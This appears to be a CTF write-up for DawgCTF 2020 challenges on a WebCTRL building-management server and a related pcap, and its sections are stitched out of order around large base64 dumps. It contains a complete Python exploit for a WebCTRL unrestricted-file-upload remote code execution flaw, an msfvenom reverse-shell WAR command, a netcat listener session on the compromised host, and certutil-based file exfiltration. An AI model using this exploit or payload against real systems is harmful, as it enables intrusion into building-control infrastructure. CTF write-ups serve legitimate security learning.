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-----END CERTIFICATE-----```
At this point you can [copy-paste it on your local system](https://github.com/m3ssap0/CTF-Writeups/raw/master/DawgCTF%202020/In%20ctrl%20%2B%20Percival%20PCAP%20Pandemonium/foo.txt) to decode it in the [original `.pcap` file](https://github.com/m3ssap0/CTF-Writeups/raw/master/DawgCTF%202020/In%20ctrl%20%2B%20Percival%20PCAP%20Pandemonium/webctrl_out.pcap).
```C:\Users\m3ssap0\CTF\DawgCTF 2020\In ctrl>certutil -decode foo.txt webctrl_out.pcapLunghezza input = 56472Lunghezza output = 41029CertUtil: - Esecuzione comando decode riuscita.```
## Percival PCAP Pandemonium Part 1
* **Category:** web/networking* **Points:** 25
### Challenge
> There is an embedded device and some traffic that was being debugged here.> > What is the IP of the embedded device?> > Submit IP as: DawgCTF{xxx.xx.x.xx}> > Author: drew, Percival
### Solution
Analyzing the traffic you can discover that the IP is: 172.24.0.15.
The flag is the following.
```DawgCTF{172.24.0.15}```
## Percival PCAP Pandemonium Part 2
* **Category:** web/networking* **Points:** 75
### Challenge
> There is an embedded device and some traffic that was being debugged here.> > What frame number restarts the device?> > Enter your response as: DawgCTF{xxx}> > Authors: Percival and drew
### Solution
Analyzing the traffic you can discover that the frame is the #167.
The flag is the following.
```DawgCTF{167}``` |
# DawgCTF 2020 – In ctrl + Percival PCAP Pandemonium
These are multiple challenges connected together.
## In ctrl
* **Category:** misc* **Points:** 200
### Challenge
> WebCtrl is really secure I don't know what you're talking about.> > Note: All links are identical and only one link is needed to solve the challenge.> > percival1.ctf.umbccd.io percival2.ctf.umbccd.io percival3.ctf.umbccd.io percival4.ctf.umbccd.io percival5.ctf.umbccd.io> > Author: drew, Percival
### Solution
The host has an installation of WebCTRL system. It allows building operators to optimize and manage all of their building systems - including HVAC, lighting, fire, elevators, and security - all within a single HVAC controls platform. It's everything they need to keep occupants comfortable, manage energy conservation measures, identify key operational problems, and validate the results.
The installed system allows you to authenticate with `Administrator` user and no password or without username and password with `Anonymous` user.
Once logged you can discover the version of WebCTRL is 6.0.
Googling around, you can discover that the system is vulnerable to an Unrestricted File Upload which could lead to Remote Code Execution; a [public exploit is available](https://www.exploit-db.com/exploits/42544).
The issue is caused due to the improper verification when uploading Add-on (`.addons` or `.war`) files using the `uploadwarfile` servlet. This can be exploited to execute arbitrary code by uploading a malicious web archive file that will run automatically and can be accessed from within the webroot directory.
A malicious `.war` file can be created with the following command.
```m3ssap0@server:~$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=1337 -f war > m3ssap0.warPayload size: 1100 bytesFinal size of war file: 1100 bytes```
The original [public exploit](https://www.exploit-db.com/exploits/42544) was not working correctly due to errors with authentication. Considering that it was referred to version 6.5, I patched it to accept two more input parameters:* authentication cookies which you can get after login on the web application;* `wbs` token which you can grab analyzing HTTP traffic to the web application.
The [patched exploit](https://github.com/m3ssap0/CTF-Writeups/raw/master/DawgCTF%202020/In%20ctrl%20%2B%20Percival%20PCAP%20Pandemonium/exploit.py) is the following.
```pythonimport itertoolsimport mimetoolsimport mimetypesimport cookielibimport binasciiimport urllib2import urllibimport sysimport reimport os
from urllib2 import URLErrorglobal bindata
__author__ = 'lqwrm'
piton = os.path.basename(sys.argv[0])
def bannerche(): print ''' @-------------------------------------------------@ | | | WebCTRL 6.5 Authenticated RCE PoC | | ID: ZSL-2017-5431 | | Copyleft (c) 2017, Zero Science Lab | | | @-------------------------------------------------@ ''' if len(sys.argv) < 3: print '[+] Usage: '+piton+' <IP> <WAR FILE> <COOKIES> <WBS TOKEN>' print '[+] Example: '+piton+' 10.0.0.17 webshell.war\n' sys.exit()
bannerche()
host = sys.argv[1]filename = sys.argv[2]cookies = sys.argv[3]token = sys.argv[4]
with open(filename, 'rb') as f: content = f.read()hexo = binascii.hexlify(content)bindata = binascii.unhexlify(hexo)
cj = cookielib.CookieJar()opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))urllib2.install_opener(opener)
print '[+] Probing target http://'+host
try: checkhost = opener.open('http://'+host+'/index.jsp?operatorlocale=en')except urllib2.HTTPError, errorzio: if errorzio.code == 404: print '[!] Error 001:' print '[-] Check your target!' print sys.exit()except URLError, errorziocvaj: if errorziocvaj.reason: print '[!] Error 002:' print '[-] Check your target!' print sys.exit()
print '[+] Target seems OK.'
print '[+] Sending payload.'
class MultiPartForm(object):
def __init__(self): self.form_fields = [] self.files = [] self.boundary = mimetools.choose_boundary() return
def get_content_type(self): return 'multipart/form-data; boundary=%s' % self.boundary
def add_field(self, name, value): self.form_fields.append((name, value)) return
def add_file(self, fieldname, filename, fileHandle, mimetype=None): body = fileHandle.read() if mimetype is None: mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream' self.files.append((fieldname, filename, mimetype, body)) return
def __str__(self):
parts = [] part_boundary = '--' + self.boundary
parts.extend( [ part_boundary, 'Content-Disposition: form-data; name="%s"' % name, '', value, ] for name, value in self.form_fields )
parts.extend( [ part_boundary, 'Content-Disposition: file; name="%s"; filename="%s"' % \ (field_name, filename), 'Content-Type: %s' % content_type, '', body, ] for field_name, filename, content_type, body in self.files )
flattened = list(itertools.chain(*parts)) flattened.append('--' + self.boundary + '--') flattened.append('') return '\r\n'.join(flattened)
if __name__ == '__main__': try: form = MultiPartForm() form.add_field('wbs', token) form.add_field('file"; filename="'+filename, bindata) request = urllib2.Request('http://'+host+'/_common/servlet/lvl5/uploadwarfile') request.add_header('User-agent', 'SCADA/8.0') body = str(form) request.add_header('Content-type', form.get_content_type()) request.add_header('Cookie', cookies) request.add_header('Content-length', len(body)) request.add_data(body) request.get_data() urllib2.urlopen(request).read()
print '[+] Payload uploaded.' print '[+] Shell available at: http://'+host+'/'+filename[:-4] print except urllib2.HTTPError as e: print e.code print e.read()
sys.exit()```
The exploit can be launched with a command like the following.
```m3ssap0@server:~$ python2 exploit.py percival4.ctf.umbccd.io m3ssap0.war "JSESSIONID=5F744836401DA55CDC1474DAFA1B7E6F; JSESSIONIDSSO=9FB32E3316D9800C4C96890CCBE3FE99" 59
@-------------------------------------------------@ | | | WebCTRL 6.5 Authenticated RCE PoC | | ID: ZSL-2017-5431 | | Copyleft (c) 2017, Zero Science Lab | | | @-------------------------------------------------@
[+] Probing target http://percival4.ctf.umbccd.io[+] Target seems OK.[+] Sending payload.[+] Payload uploaded.[+] Shell available at: http://percival4.ctf.umbccd.io/m3ssap0```
At this point, visiting the `http://percival4.ctf.umbccd.io/m3ssap0` will spawn a shell on your listening server. You can now find the flag.
```m3ssap0@server:~$ nc -lvk 1337Listening on [0.0.0.0] (family 0, port 1337)Connection from ec2-52-202-94-107.compute-1.amazonaws.com 49557 received!Microsoft Windows [Version 6.1.7601]Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\WebCTRL6.0>cd ..cd ..
C:\>dirdir Volume in drive C has no label. Volume Serial Number is EECC-6B81
Directory of C:\
2020-04-08 15:03 130 FLAG.TXT2009-07-13 23:20 <DIR> PerfLogs2020-04-10 00:12 <DIR> Program Files2019-11-04 20:28 <DIR> Program Files (x86)2019-07-29 12:34 <DIR> Users2020-04-11 16:24 <DIR> WebCTRL6.02020-04-10 00:23 <DIR> Windows 1 File(s) 130 bytes 6 Dir(s) 20,858,126,336 bytes free
C:\>type FLAG.TXTtype FLAG.TXTDawgCTF{t0mc@t_3xplo1t5}Go to C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps\README.txt for another clue.```
The flag is the following
```DawgCTF{t0mc@t_3xplo1t5}```
At this point, two new hidden challenges are unlocked under web/networking category. The `FLAG.TXT` file talks about another file related to new challenges.
You can read it with the following commands.
```C:\WebCTRL6.0>type "C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps\README.txt"type "C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps\README.txt"The PCAP file in this directory contains some data about what traffic happens in this server. There is an embedded device and some traffic that was being debugged here.What is the IP of the embedded device?What protocol is the embedded device communicating with?What is sent to reset the device?
C:\WebCTRL6.0>cd "C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps\"cd "C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps\"
C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps>dirdir Volume in drive C has no label. Volume Serial Number is EECC-6B81
Directory of C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps
2020-04-08 15:03 304 README.txt2020-04-08 14:50 41,029 webctrl_out.pcap 2 File(s) 41,333 bytes 0 Dir(s) 20,857,974,784 bytes free
```
To exfiltrate `webctrl_out.pcap` you can convert it into base64 and then print it, in order to copy-paste data without problems due to the presence of binary values.
```C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps>certutil -encode webctrl_out.pcap foo.txtcertutil -encode webctrl_out.pcap foo.txtInput Length = 41029Output Length = 56474CertUtil: -encode command completed successfully.
C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps>type foo.txttype foo.txt-----BEGIN CERTIFICATE-----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